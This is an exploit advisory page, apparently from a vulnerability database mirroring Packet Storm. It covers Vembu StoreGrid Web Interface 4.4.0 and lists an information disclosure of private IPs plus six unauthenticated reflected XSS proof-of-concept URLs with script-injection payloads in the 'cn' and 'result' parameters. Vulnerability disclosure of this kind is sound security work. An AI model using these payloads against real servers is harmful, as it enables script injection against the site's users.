Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormGionathan RealePACKETSTORM:152110
HistoryMar 15, 2019 - 12:00 a.m.

Vembu Storegrid Web Interface 4.4.0 Cross Site Scripting / Information Disclosure

2019-03-1500:00:00
Gionathan Reale
packetstormsecurity.com
51

0.055 Low

EPSS

Percentile

92.5%

JSON
`# Exploit Title: Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities   
# Discovery Date: 2018-12-05   
# Exploit Author: Gionathan "John" Reale   
# Vendor Homepage: https://www.vembu.com/   
# Software Link : N/A  
# Google Dork: N/A  
# Version: 4.4.0   
# CVE : CVE-2014-10078,CVE-2014-10079  
Description StoreGrid enables you to offer an automated online backup service to your customers and is designed to be flexible to your needs. Upon investigating the web interface I discovered multiple vulnerabilities.   
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////   
Information Disclosure. The front page of the server web interface leaks the private IP address in the hidden form "ipaddress" around line 80.   
==========================================================================================================================   
Reflected XSS. The server web interface contains multiple reflected XSS exploits that do not require authentication.   
https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result=   
https://xxxxxxxx.xx:6061//interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result=   
https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result=   
https://xxxxxxxxx.xx:6061/interface/registerreseller/onlineregfailure.php?cn=gar&result=</font><script>alert(1);</script><font>   
https://xxxxxxxxx.xx:6061/interface/registerclient/onlineregfailure.php?cn=gar&result=</font><script>alert(1);</script><font>   
https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregfailure.php?cn=gar&result=</font><script>alert(1);</script><font>   
=============================================================================================================================   
Self XSS. The server web interface contains a self XSS in the search function.   
==============================================================================================================================  
`

Related

exploitpack 1
zdt 1
exploitdb 1
prion 2
cve 2
exploitpack
exploitpack
Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities
2019-03-15 00:00:00
zdt
zdt
Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities
2019-03-15 00:00:00
exploitdb
exploitdb
Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities
2019-03-15 00:00:00
prion
prion
Code injection
2019-02-23 14:29:00
Input validation
2019-02-23 14:29:00
cve
cve
CVE-2014-10079
2019-02-23 14:29:00
CVE-2014-10078
2019-02-23 14:29:00

0.055 Low

EPSS

Percentile

92.5%

JSON
Related for PACKETSTORM:152110
exploitpack1zdt1exploitdb1prion2cve2